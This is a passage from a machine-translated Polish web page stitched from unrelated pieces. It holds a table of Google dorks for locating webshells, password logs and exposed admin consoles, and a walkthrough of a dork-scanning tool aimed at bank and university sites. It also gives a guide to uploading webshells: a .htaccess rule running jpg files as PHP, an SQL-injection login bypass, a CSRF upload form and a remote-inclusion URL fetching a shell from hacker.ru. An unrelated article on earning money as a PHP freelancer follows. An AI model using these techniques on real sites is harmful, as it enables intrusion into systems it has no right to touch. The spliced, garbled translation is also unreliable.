width="168">Przyczółki <br></td> <td width="190">Powłoki internetowe, publiczne menedżery plików <br></td> <td width="284">Znajdź wszystkie zhakowane witryny, na które przesłane zostały wymienione powłoki internetowe: <br>(intitle:"phpshell" LUB intitle:"c99shell" LUB intitle:"r57shell" LUB intitle:"PHP Shell" LUB intitle:"phpRemoteView") `rwx` "uname" <br></td> </tr><tr><td width="168">Pliki zawierające nazwy użytkowników <br></td> <td width="190">Pliki rejestru, pliki konfiguracyjne, logi, pliki zawierające historię wprowadzonych poleceń <br></td> <td width="284">Znajdź wszystkie pliki rejestru zawierające informacje o koncie: <br><i>typ pliku:reg reg +intext:„menedżer kont internetowych”</i><br></td> </tr><tr><td width="168">Wrażliwe katalogi <br></td> <td width="190">Katalogi z różnymi informacjami (dokumenty osobiste, konfiguracje VPN, ukryte repozytoria itp.) <br></td> <td width="284">Znajdź wszystkie listy katalogów zawierające pliki związane z VPN: <br><i>„Konfiguracja” intitle: „Indeks” intext: vpn</i><br>Strony zawierające repozytoria git: <br><i>(intext:"indeks /.git") („katalog nadrzędny")</i><br></td> </tr><tr><td width="168">Wykrywanie serwera WWW <br></td> <td width="190">Wersja i inne informacje o serwerze WWW <br></td> <td width="284">Znajdź konsole administracyjne serwera JBoss: <br><i>inurl:"/web-console/" intitle:"Konsola administracyjna"</i><br></td> </tr><tr><td width="168">Wrażliwe pliki <br></td> <td width="190">Skrypty zawierające znane luki <br></td> <td width="284">Znajdź witryny, które używają skryptu umożliwiającego przesłanie dowolnego pliku z serwera: <br><i>allinurl:forcedownload.php?file=</i><br></td> </tr><tr><td width="168">Wrażliwe serwery <br></td> <td width="190">Skrypty instalacyjne, powłoki internetowe, otwarte konsole administracyjne itp. <br></td> <td width="284">Znajdź otwarte konsole PHPMyAdmin działające jako root: <br><i>intitle:phpMyAdmin "Witamy w phpMyAdmin ***" "działa na * jako root@*"</i><br></td> </tr><tr><td width="168">Komunikaty o błędach <br></td> <td width="190">Różne błędy i ostrzeżenia często ujawniają ważne informacje - od wersji CMS po hasła <br></td> <td width="284">Witryny, które mają błędy w wykonywaniu zapytań SQL do bazy danych: <br><i>„Ostrzeżenie: mysql_query()” „nieprawidłowe zapytanie”</i><br></td> </tr><tr><td width="168">Pliki zawierające soczyste informacje <br></td> <td width="190">Certyfikaty, kopie zapasowe, e-maile, logi, skrypty SQL itp. <br></td> <td width="284">Znajdź inicjujące skrypty sql: <br><i>typ pliku:sql i „wstaw do” -site:github.com</i><br></td> </tr><tr><td width="168">Pliki zawierające hasła <br></td> <td width="190">Wszystko, co może zawierać hasła - logi, skrypty SQL itp. <br></td> <td width="284">Logi zawierające hasła: <br><i>Typ pliku:</i><i>dziennik</i><i>w tekście:</i><i>hasło |</i><i>przejść |</i><i>pw</i><br>skrypty sql zawierające hasła: <br><i>wew.:</i><i>sql</i><i>w tekście:</i><i>nazwa użytkownika</i><i>w tekście:</i><i>hasło</i><br></td> </tr><tr><td width="168">Wrażliwe informacje dotyczące zakupów online <br></td> <td width="190">Informacje związane z zakupami online <br></td> <td width="284">Znajdź kody PIN: <br><i>dcid=</i><i>bn=</i><i>szpilka</i><i>kod=</i><br></td> </tr><tr><td width="168">Dane sieciowe lub dotyczące luk w zabezpieczeniach <br></td> <td width="190">Informacje niezwiązane bezpośrednio z zasobem sieciowym, ale mające wpływ na sieć lub inne usługi inne niż sieciowe <br></td> <td width="284">Znajdź skrypty automatycznej konfiguracji proxy zawierające informacje o sieci wewnętrznej: <br><i>inurl:proxy | inurl:wpad wew:pac | ext:dat findproxyforurl</i><br></td> </tr><tr><td width="168">Strony zawierające portale logowania <br></td> <td width="190">Strony zawierające formularze logowania <br></td> <td width="284">strony internetowe saplogonu: <br><i>intekst:"2016 SAP AG. Wszelkie prawa zastrzeżone." tytuł: „Zaloguj się”</i><br></td> </tr><tr><td width="168">Różne urządzenia internetowe <br></td> <td width="190">Drukarki, routery, systemy monitorowania itp. <br></td> <td width="284">Znajdź panel konfiguracji drukarki: <br><i>tytuł:"</i><i>KM</i><i>strumień laserowy”</i><i>adres:</i><i>SSI/</i><i>Autoryzacja/</i><i>ustawić_</i><i>konfiguracja_</i><i>informacje o urządzeniu.</i><i>htm</i><br></td> </tr><tr><td width="168">Zalecenia i luki w zabezpieczeniach <br></td> <td width="190">Strony internetowe na podatnych na ataki wersjach CMS <br></td> <td width="284">Znajdź podatne wtyczki, za pomocą których możesz przesłać dowolny plik na serwer: <br><i>inurl:fckeditor -intext:"ConfigIsEnabled = False" intext:ConfigIsEnabled</i><br></td> </tr></tbody></table><br>Dorks częściej skupiają się na wyszukiwaniu we wszystkich witrynach internetowych. Ale nic nie stoi na przeszkodzie, aby ograniczyć zakres wyszukiwania w dowolnej witrynie lub witrynach. <br>Każde zapytanie Google może skupiać się na konkretnej witrynie, dodając do zapytania słowo kluczowe „site:somesite.com”. To słowo kluczowe można dodać do dowolnego dorka. <p><b>Automatyzacja wyszukiwania podatności</b><br>Tak narodził się pomysł napisania prostego narzędzia, które automatyzuje wyszukiwanie luk w zabezpieczeniach za pomocą wyszukiwarki (google) i opiera się na bazie danych Google Hack.</p><p>Narzędzie to skrypt napisany w nodejs przy użyciu phantomjs. Mówiąc ściślej, skrypt jest interpretowany przez sam phantomjs. <br>Phantomjs to pełnoprawna przeglądarka internetowa bez GUI, sterowana przez kod js i z wygodnym API. <br>Narzędzie otrzymało dość zrozumiałą nazwę - dorks. Uruchamiając go z linii poleceń (bez opcji) otrzymujemy krótką pomoc z kilkoma przykładami użycia: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/edd/6fb/ccc/edd6fbccc5ec340abe750f3073c1b427.jpg' width="100%" loading=lazy loading=lazy><br>Rysunek 1 – Lista głównych opcji</p><p>Ogólna składnia narzędzia jest następująca: dork „polecenie” „lista opcji”. <br>Szczegółowy opis wszystkich opcji przedstawiono w tabeli 4.</p><p>Tabela 4 – Składnia Dorksa <br></p><table border="1"><tbody><tr><td width="214"><b>Zespół</b><br></td> <td width="214"><b>Opcja</b><br></td> <td width="214"><b>Opis</b><br></td> </tr><tr><td rowspan="4" width="214">ghdb <br></td> <td width="214">-l <br></td> <td width="214">Wydrukuj numerowaną listę kategorii dork Baza danych Google Hack <br></td> </tr><tr><td width="214">-c „numer lub nazwa kategorii” <br></td> <td width="214">Załaduj drzwi określonej kategorii według numeru lub nazwy <br></td> </tr><tr><td width="214">-q „fraza” <br></td> <td width="214">Pobierz dorks znalezione na życzenie <br></td> </tr><tr><td width="214">-o „plik” <br></td> <td width="214">Zapisz wynik do pliku (tylko z opcją -c|-q) <br></td> </tr><tr><td rowspan="8" width="214">Google <br></td> <td width="214">-d "dziwka" <br></td> <td width="214">Ustaw dowolny dork (opcji można użyć wielokrotnie, dozwolona jest kombinacja z opcją -D) <br></td> </tr><tr><td width="214">-D „plik” <br></td> <td width="214">Użyj dorks z pliku <br></td> </tr><tr><td width="214">-s „strona” <br></td> <td width="214">Ustaw miejsce (opcja może być używana wielokrotnie, dozwolona jest kombinacja z opcją -S) <br></td> </tr><tr><td width="214">-S „plik” <br></td> <td width="214">Użyj witryn z pliku (dorks będzie wyszukiwany dla każdej witryny niezależnie) <br></td> </tr><tr><td width="214">-f „filtr” <br></td> <td width="214">Ustaw dodatkowe słowa kluczowe (zostaną dodane do każdego dorka) <br></td> </tr><tr><td width="214">-t "liczba ms" <br></td> <td width="214">Odstęp między żądaniami kierowanymi do Google <br></td> </tr><tr><td width="214">-T "liczba ms" <br></td> <td width="214">Limit czasu w przypadku napotkania captcha <br></td> </tr><tr><td width="214">-o „plik” <br></td> <td width="214">Zapisz wynik do pliku (zapisane zostaną tylko te utwory, dla których coś znaleziono) <br></td> </tr></tbody></table><br>Używając polecenia ghdb, możesz pobrać wszystkie głupstwa z exploit-db na dowolne żądanie lub określić całą kategorię. Jeśli określisz kategorię 0, cała baza danych zostanie wyładowana (około 4,5 tys. dorków). <p>Listę aktualnie dostępnych kategorii przedstawia rysunek 2. <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/b8f/b11/ffe/b8fb11ffeaced5066fd2fd9e43be67fb.jpg' width="100%" loading=lazy loading=lazy></p><p>Rysunek 2 – Lista dostępnych kategorii dork GHDB</p><p>Zespół Google wstawi każdy głupek do wyszukiwarki Google i przeanalizuje wynik pod kątem dopasowań. Ścieżki, w których coś zostało znalezione, zostaną zapisane w pliku. <br>Narzędzie obsługuje różne tryby wyszukiwania: <br>1 głupek i 1 miejsce; <br>1 idiota i wiele witryn; <br>1 strona i wiele kretynów; <br>wiele miejsc i wiele głupstw; <br>Listę idiotów i witryn można określić za pomocą argumentu lub pliku.</p><p><b>Demonstracja pracy</b><br>Spróbujmy poszukać ewentualnych podatności na przykładzie wyszukiwania komunikatów o błędach. Poleceniem: dorks ghdb –c 7 –o error.dorks zostaną załadowane wszystkie znane dorks z kategorii „Komunikaty o błędach”, jak pokazano na rysunku 3. <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/28c/386/641/28c386641d1528652f7f8e8b8089097a.jpg' width="100%" loading=lazy loading=lazy><br>Rysunek 3 – Ładowanie wszystkich znanych komunikatów z kategorii „Komunikaty o błędach”.</p><p>Dorks są pobierane i zapisywane w pliku. Teraz pozostaje tylko „ustawić” je w jakiejś witrynie (patrz rysunek 4). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/8e0/a8a/3af/8e0a8a3af4f26544da1faa584813dbff.jpg' width="100%" loading=lazy loading=lazy><br>Rysunek 4 – Wyszukaj luki w interesującej Cię witrynie w pamięci podręcznej Google</p><p>Po pewnym czasie w badanej witrynie odkrywanych jest kilka stron zawierających błędy (patrz rysunek 5).</p><p><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/10b/e83/ba3/10be83ba38f172213ba06b3f9ad05a58.jpg' width="100%" loading=lazy loading=lazy><br>Rysunek 5 – Znaleziono komunikaty o błędach</p><p>W rezultacie w pliku wynik.txt otrzymujemy pełną listę błędów, które prowadzą do błędu. <br>Rysunek 6 przedstawia wynik wyszukiwania błędów witryny. <br><br>Rysunek 6 – Wynik wyszukiwania błędów</p><p>W pamięci podręcznej tego kretyna wyświetlany jest pełny ślad wsteczny, ujawniający bezwzględne ścieżki skryptów, system zarządzania treścią witryny i typ bazy danych (patrz rysunek 7). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/0a9/455/588/0a9455588496d6609f5e13d598cb5a48.jpg' width="100%" loading=lazy loading=lazy><br>Rysunek 7 – ujawnienie informacji o projekcie witryny</p><p>Warto jednak wziąć pod uwagę, że nie wszystkie głupki z GHDB dają prawdziwe wyniki. Ponadto Google może nie znaleźć dokładnego dopasowania i wyświetlić podobny wynik.</p><p>W takim przypadku rozsądniej jest skorzystać z osobistej listy kretynów. Przykładowo zawsze warto szukać plików z „nietypowymi” rozszerzeniami, których przykłady pokazano na rysunku 8. <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/d7f/865/693/d7f865693f7fcf13137598eeed0ecb58.jpg' width="100%" loading=lazy loading=lazy><br>Rysunek 8 – Lista rozszerzeń plików, które nie są typowe dla zwykłego zasobu sieciowego</p><p>W rezultacie za pomocą polecenia dorks google –D rozszerzenia.txt –f bank Google już od pierwszego żądania zaczyna zwracać witryny z „nietypowymi” rozszerzeniami plików (patrz rysunek 9). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/107/e1f/a2f/107e1fa2f41c4169bcc254cba2f2f4b6.jpg' width="100%" loading=lazy loading=lazy><br>Rysunek 9 – Wyszukaj „złe” typy plików na stronach banków</p><p>Warto pamiętać, że Google nie akceptuje zapytań dłuższych niż 32 słowa.</p><p>Użycie polecenia dorks google –d intext:”błąd|ostrzeżenie|powiadomienie|składnia” –f uniwersytet <br>Błędów interpretera PHP możesz szukać na stronach edukacyjnych (patrz rysunek 10). <br><br><img src='https://i2.wp.com/habrastorage.org/getpro/habr/post_images/717/74f/e36/71774fe3656bfc058c42d43262fdec4a.jpg' width="100%" loading=lazy loading=lazy><br>Rysunek 10 – Znajdowanie błędów wykonawczych PHP</p><p>Czasami nie jest wygodnie używać jednej lub dwóch kategorii dorków. <br>Na przykład, jeśli wiadomo, że witryna działa na silniku Wordpress, wówczas potrzebujemy modułów specyficznych dla WordPressa. W takim przypadku wygodnie jest skorzystać z wyszukiwania w bazie danych Google Hack. Polecenie dorks ghdb –q wordpress –o wordpress_dorks.txt pobierze wszystkie dorks z Wordpress, jak pokazano na rysunku 11: <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/dcb/ac9/a4e/dcbac9a4eb12f6ec775d9cccc2fdee87.jpg' width="100%" loading=lazy loading=lazy><br>Rysunek 11 – Wyszukaj Dorks związany z Wordpressem</p><p>Wróćmy ponownie do banków i użyjmy polecenia dorks google –D wordpress_dords.txt –f bank, aby spróbować znaleźć coś interesującego związanego z Wordpressem (patrz rysunek 12). <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/042/0c2/c43/0420c2c435931704288b171f725ccc6a.jpg' width="100%" loading=lazy loading=lazy><br>Rysunek 12 – Wyszukaj luki w WordPressie</p><p>Warto zaznaczyć, że wyszukiwanie w Google Hack Database nie akceptuje słów krótszych niż 4 znaki. Na przykład, jeśli nie jest znany CMS witryny, ale znany jest język - PHP. W takim przypadku możesz odfiltrować potrzebne informacje ręcznie, korzystając z potoku i narzędzia wyszukiwania systemowego dorks –c all | findstr /I php > php_dorks.txt (patrz rysunek 13): <br><br><img src='https://i1.wp.com/habrastorage.org/getpro/habr/post_images/4c1/2f8/6e1/4c12f86e111074293c14d6a939c6ebab.jpg' width="100%" loading=lazy loading=lazy><br>Rysunek 13 – Przeszukaj wszystkie głupstwa, w których wspomniano o PHP</p><p>Wyszukiwanie luk w zabezpieczeniach lub niektórych wrażliwych informacji w wyszukiwarce powinno odbywać się tylko wtedy, gdy na tej stronie znajduje się znaczący indeks. Na przykład, jeśli witryna ma zaindeksowanych 10-15 stron, głupio jest szukać czegokolwiek w ten sposób. Sprawdzenie rozmiaru indeksu jest łatwe – wystarczy wpisać „site:somesite.com” w pasku wyszukiwania Google. Przykład witryny z niewystarczającym indeksem pokazano na rysunku 14. <br><br><img src='https://i0.wp.com/habrastorage.org/getpro/habr/post_images/78e/1db/b4f/78e1dbb4fc78cd422cec311fc2ca9d33.jpg' width="100%" loading=lazy loading=lazy><br>Rysunek 14 – Sprawdzanie rozmiaru indeksu witryny</p><p>A teraz o nieprzyjemnym... Od czasu do czasu Google może poprosić o captcha - nic na to nie poradzisz - będziesz musiał je wpisać. Na przykład podczas przeszukiwania kategorii „Komunikaty o błędach” (90 dorks) captcha pojawiła się tylko raz.</p><p>Warto dodać, że phantomjs obsługuje także pracę poprzez proxy, zarówno poprzez interfejs http, jak i skarpetki. Aby włączyć tryb proxy, musisz odkomentować odpowiednią linię w pliku dorks.bat lub dorks.sh.</p><p>Narzędzie jest dostępne w postaci kodu źródłowego</p> <br>W tym artykule chcę omówić najczęściej stosowane metody przesyłania powłoki na stronę internetową. <b>Powłoka internetowa</b> to rodzaj złośliwego skryptu (programu), którego atakujący używają do kontrolowania stron internetowych lub serwerów. <p><b>Metoda 1</b><br>Znajdź na stronie formularz umożliwiający przesyłanie plików/zdjęć. Załóżmy, że nie udało nam się zhakować panelu administracyjnego witryny i próbujemy zalać naszą powłokę <b>rozszerzenie.php.jpg .</b> Jeśli się powiedzie, zamiast obrazu zobaczymy białe okno, klikamy prawym przyciskiem myszy i podążamy za linkiem. W razie niepowodzenia możemy skorzystać z rozszerzenia chrome <b>manipulacji danymi</b>. Pozwala przechwycić i zmienić żądanie według własnego uznania. Jeśli witryna sprawdzi rozszerzenie pliku, to najpierw możemy przesłać <b>.htaccess</b> plik o zawartości: <br>Dodaj typ aplikacji/x-httpd-php .jpg <br>To polecenie wykona pliki jpg jako php. <br><b>Szczegółowe instrukcje wideo:</b><br></p><p><span class="imp1oe54JeQ"></span></p><p>Instrukcje wideo dla <b>sabotaż instalacji danych:</b><br></p><p><span class="JA5K4KJ0NCc"></span></p><br><b>Metoda 2</b><br>Skorzystaj z programu do wyszukiwania paneli administracyjnych w serwisie - https://github.com/bdblackhat/admin-panel-finder. Gdy program odnajdzie panel administracyjny możemy spróbować wykonać iniekcję sql. W polu login i hasło serwisu wpisujemy kod: <br><p>" lub "1"="1 " LUB 1=1/*</p><p>Jeśli zadziała to przechodzimy do panelu administracyjnego i <b>Postępujemy zgodnie z metodą 1.</b> Jeśli w panelu administracyjnym witryny nie ma wtrysku sql, możemy spróbować go zdebugować lub znaleźć exploit dla tego CMS-a. <br><b>Szczegółowe instrukcje wideo:</b><br></p><p><span class="5Kh5gCr_3rc"></span></p><br><b>Metoda 3</b><br>W metodzie 3 będziemy szukać wtrysku sql na samej stronie. Możemy to zrobić ręcznie lub użyć sqlmap. Tematów na temat wykonywania zastrzyków jest wystarczająco dużo na forum, więc przyjdę z daleka. Zatem teraz znaleźliśmy już tabelkę z loginem i hasłem administratora, odszyfrujmy hasze, przejdźmy do panelu administracyjnego i radujmy się. Ale powiedzmy, że nie mogliśmy odszyfrować hasła i wszystko poszło nie tak, wtedy musimy sprawdzić uprawnienia naszego użytkownika <b>. </b> Sprawdzamy uprawnienia i ładujemy mini-powłokę. <b>Z jakiegoś powodu, gdy chcę wkleić kod, witryna wyświetla mi błąd.</b><p><b>Metoda 4</b><br>Metoda 4 obejmuje atak csrf. W poniższym kodzie musimy zastąpić <b>http://</b> do naszego docelowego łącza. <b>Wybierz powłokę</b> i naciśnij przycisk <b>wgrywać.</b><br></p><p> <form method="POST" action="http://" enctype="multipart/form-data" > <input type="file" name="Filedata"></center><br> <input type="submit" name="Submit" value="Wgrywać"> </form></p><p><span class="FXOjzV5I1Cc"></span></p><br><b>Metoda 5</b><br>Dowiedz się więcej o swoim celu i znajdź exploita. Istnieje bardzo interesująca strona internetowa poświęcona temu zagadnieniu - https://www.exploit-db.com. Nikt nie odwołał masowego hakowania stron internetowych poprzez luki w zabezpieczeniach, ale w formularzu jest już artykuł na ten temat. <p>Sposobów na wypełnienie muszli jest znacznie więcej i nie ma sensu mówić o każdym z nich. Jeśli chcesz poćwiczyć, zainstaluj dvwa - jest to program zaprojektowany, aby pomóc specjalistom ds. bezpieczeństwa przetestować swoje umiejętności i narzędzia w środowisku prawnym.</p><p><b>Metoda 6 <br><b>Zastrzyk PHP</b>- jest to forma ataku na stronę internetową, polegająca na tym, że osoba atakująca wstrzykuje swój kod PHP do atakowanej aplikacji PHP.</b><br>www.site.ru?page=home.html <br>Wykonując polecenie, załadujemy stronę główną HTML. Teraz spróbujemy załadować złośliwą powłokę. <br>www.site.ru?page=http://hacker.ru/webshell.php <br>Kurek: <b>Inurl:strona=</b></p><p>Istnieje również sposób na znalezienie już załadowanej powłoki za pomocą Perla</p> <p> » </p><h1>Jak programista PHP może zarobić dobre pieniądze w domu?</h1><p>Programiści PHP odnoszący największe sukcesy zarabiają dobre pieniądze w domu. Na początku każdego dochodu pojawiają się trudności. Zdarza się, że trudności i brak wiedzy o sposobach zarabiania zniechęcają do wszelkiej chęci zarabiania w domu, a wówczas programiści szukają możliwości pracy w biurach, gdzie jest większa gwarancja otrzymania pieniędzy co miesiąc, a rozwój zawodowy jest możliwy.</p><p>Jednak możliwość pracy w domu ma więcej zalet niż wad.</p><h3>plusy</h3><p>Będziesz pracować dla siebie. Nikt Cię nie zwolni, będziesz mógł rozdzielić swój własny harmonogram lub pracę w dowolnym czasie.</p><p>Wybierasz dla siebie sposób na zarabianie pieniędzy za pomocą programowania, co po pierwsze zwiększy Twoje zainteresowanie pracą, a po drugie masz dużą swobodę działania. Nie musisz pracować nad czymś, czego nie lubisz. Istnieje również więcej możliwości łączenia sposobów zarabiania pieniędzy.</p><h3>Minusy</h3><p>Na początku będzie to trudne, a aby zdobyć pierwsze pieniądze za swoją pracę, trzeba włożyć dużo wysiłku i czasu. Aby osiągnąć zysk, musisz stale się rozwijać i mieć cierpliwość oraz prawidłowo rozłożyć swój harmonogram, aby mieć wystarczająco dużo czasu na terminowe wykonanie pracy.</p><h3>Zarabianie na swoich skryptach</h3><p>W Internecie istnieje wiele różnych skryptów, które można łatwo pobrać i zainstalować na swojej stronie internetowej. Możesz napisać swój własny, unikalny skrypt i istnieją dwie możliwości zarabiania na nim pieniędzy. Sprzedaj go lub opublikuj za pośrednictwem usług udostępniania plików. Możesz także skorzystać z dwóch opcji. Na przykład lekkie skrypty, ale jednocześnie bardzo ważne jest, aby za pośrednictwem usług udostępniania plików umieszczać dokładnie te skrypty, na które będzie duże zapotrzebowanie. Aby to zrobić, skrypty muszą być poszukiwane, aby ludzie pobierali je na swoje potrzeby.</p><p>Duże skrypty można sprzedać po rozsądnych cenach. Możesz zamieścić ogłoszenie na forach, a jeśli masz swój własny blog lub stronę internetową, zamieścić ogłoszenie o sprzedaży skryptów.</p><p>W każdym razie, niezależnie od tego, jaką opcję wybierzesz, umieść skrypt w archiwum i pamiętaj o załączeniu szczegółowych instrukcji oraz danych kontaktowych o sobie. Koniecznie zapewnij wsparcie, bo ważna jest dla Ciebie praca nad sobą. W końcu musisz zostać polecony lub pobrać swoje skrypty. Muszą być wysokiej jakości. Jeśli ktoś poprosi Cię o pomoc, grzecznie wyjaśnij mu kwestię skryptu lub pomóż go zainstalować. Twoje skrypty powinny zawierać komentarze. Za co odpowiada każda funkcja itp. W końcu osoba może łatwo pomylić się w kodzie, w którym nie ma żadnych notacji.</p><h3>Projekty własne i wspólne</h3><p>Warto stworzyć własną stronę internetową, aby skutecznie zarabiać. Istnieje wiele możliwości zarabiania pieniędzy na swojej stronie internetowej. Jeśli dobrze go wypromujesz, możesz wystawiać tam skrypty na sprzedaż. Wspólne projekty poszerzą Twoje możliwości, co jest dobre dla sukcesu w programowaniu w domu. Dlatego szukaj partnerów lub nie odrzucaj ofert wspólnego stworzenia projektu.</p><p>Pamiętaj o dodaniu funkcji, które przyciągną uwagę w Twojej witrynie. Strona może mieć regularny, prosty wygląd, ale jednocześnie mieć swój własny akcent. Osobista strona internetowa pomaga zwiększyć liczbę klientów. Zobaczą, jak działają Twoje skrypty, czy nie ładują się zbyt długo, są ciekawe w użyciu i co najważniejsze, oryginalne, niepodobne do niczego innego. Wtedy odniesiesz sukces.</p><h3>Zarabianie na zamówieniach</h3><p>Aby to zrobić, wystarczy zarejestrować się na różnych giełdach dla freelancerów i szukać zleceń. Pokaż swoje portfolio wykonanych prac. Ale uważaj, na świecie są nieuczciwi ludzie i żeby nie dać się zwieść, najpierw pokaż pracę, która znajduje się na Twoim serwerze (swoją drogą, w tym przypadku będziesz musiał wypożyczyć vps http:/ /nkvd.pro/vps/), a następnie, jeśli zapłacą ci część, przenieś połowę na ich serwer i zrób to samo z drugą częścią. Ta metoda zarabiania pieniędzy jest uważana za opłacalną, ale zależy od stopnia Twojej wiedzy i umiejętności. Zależy to również od opinii klientów. Aby odnieść sukces w tej metodzie zarabiania pieniędzy, wykonuj pracę uczciwie i efektywnie. Musisz umieć komunikować się z klientami, jasno wyjaśniać, co możesz, a czego nie możesz robić.</p><p>To nie jest cała lista zarobków programisty php, ale dzięki tym sposobom zarabiania pieniędzy, które opisano powyżej, możesz już zarabiać pieniądze bez wychodzenia z domu. Na początkowym etapie będzie to duże osiągnięcie. Najważniejsze, żeby na tym nie poprzestać. Stale doskonal się i twórz projekty, które przyniosą Ci nie tylko dobre dochody, ale także przyjemność.</p> <br><b>o autorze</b> <br><p>Jak programista PHP może zarobić dobre pieniądze w domu?</p> <script type="text/javascript"> <!-- var _acic={dataProvider:10};(function(){var e=document.createElement("script");e.type="text/javascript";e.async=true;e.src="https://www.acint.net/aci.js";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)})() //--> </script><br> <br> <script>document.write("<img style='display:none;' src='//counter.yadro.ru/hit;artfast_after?t44.1;r"+ escape(document.referrer)+((typeof(screen)=="undefined")?"": ";s"+screen.width+"*"+screen.height+"*"+(screen.colorDepth? screen.colorDepth:screen.pixelDepth))+";u"+escape(document.URL)+";h"+escape(document.title.substring(0,150))+ ";"+Math.random()+ "border='0' width='1' height='1' loading=lazy loading=lazy>");</script> </div> </article> <div class="related_block"> <div class="title">Powiązane publikacje</div> <ul class="recent_ul"> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/d356145b8d32a4e43aa5ed76e39606a7.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/pl/vstupit-v-gruppu-po-zarabotku-deneg-kak-zarabotat.html">Jak zarabiać na VKontakte na swojej stronie i bez niej - naprawdę działające metody</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/c140bebb4b361b4583c11c49e770bc39.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/pl/kak-pomenyat-temu-dlya-vkontakte-v-yandeks-brauzere-kak-pomenyat-temu-v-kontakte.html">Jak zmienić motyw VKontakte w Yandex</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img src="/uploads/40e1db5c5747911f9c43c259f44aeadb.jpg" style="width:230px; height:145px;" / loading=lazy loading=lazy></div> <a href="https://storerarity.ru/pl/nastroika-velokompyutera-na-diametr-koles-26-2-2-podklyuchenie-velokompyutera-kak.html">Ustawianie komputera rowerowego dla średnicy koła 26 2</a></li> </ul> </div> </div> <aside id="sidebar"> <div class="block"> <nav class="sidebar_menu"> <div class="menu-sidebar_menu-container"> <ul id="menu-sidebar_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/programs/">Programy</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/windows/">Okna</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/devices/">Urządzenia</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/browsers/">Przeglądarki</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/reviews/">Opinie</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/reviews/">Opinie</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/setup/">Ustawienia</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/torrent/">Potok</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/editors/">Redaktorzy</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/instagram/">Instagrama</a></li> </ul> </div> </nav> </div> <div class="block recent_block"> <div class="title">Ostatnie notatki</div> <ul class="popular"> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/5e60cc62a5f20ab07a340013922f0d2c.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="Najmniejszy komputer na świecie: zdjęcie, opis, ocena Najmniejszy komputer na świecie" / loading=lazy loading=lazy> <span class="cat">Programy</span></div> <a href="https://storerarity.ru/pl/samyi-malenkii-kompyuter-v-mire-foto-opisanie-reiting.html">Najmniejszy komputer na świecie: zdjęcie, opis, ocena Najmniejszy komputer na świecie</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/cdb555606d94b8ae1d51c87fc743c991.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="Jak zainstalować aplikację Yula i zarejestrować się" / loading=lazy loading=lazy> <span class="cat">Programy</span></div> <a href="https://storerarity.ru/pl/kak-postavit-prilozhenie-yula-zaregistrirovatsya-prilozhenie-yula-ustanovka.html">Jak zainstalować aplikację Yula i zarejestrować się</a></li> <li> <div class="img_block"> <div class="overlay"></div> <img width="240" height="145" src="/uploads/af70d4bfa7ecf603e659893b5979f8d6.jpg" class="attachment-popular_thumb size-popular_thumb wp-post-image" alt="Smartfon Samsung Grand Duos: charakterystyka, recenzje, opis Samsung Galaxy Grand Duos" / loading=lazy loading=lazy> <span class="cat">Programy</span></div> <a href="https://storerarity.ru/pl/samsung-galaxy-grand-duos-bolshoi-i-moshchnyi-smartfon-samsung-grand-duos-harakteristiki-otzyvy-sam.html">Smartfon Samsung Grand Duos: charakterystyka, recenzje, opis Samsung Galaxy Grand Duos</a></li> </ul> </div> </aside> </div> </div> <div class="clear"></div> <footer id="footer"><div class="wrapper"> <div class="copy">2024 | Komputery dla każdego - konfiguracja, instalacja, odzyskiwanie</div> <nav class="header_menu"> <div class="menu-footer_menu-container"> </div> </nav> </div></footer> <div id="toTop"></div> <script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1/jquery.min.js'></script> <nav class="mobile_menu"> <div class="close_menu"></div> <div class="mob_menu"> <div class="menu-mobile_menu-container"> <ul id="menu-mobile_menu" class="menu"> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/programs/">Programy</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a href="https://storerarity.ru/pl/category/windows/">Okna</a></li> <li id="menu-item-" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-"><a 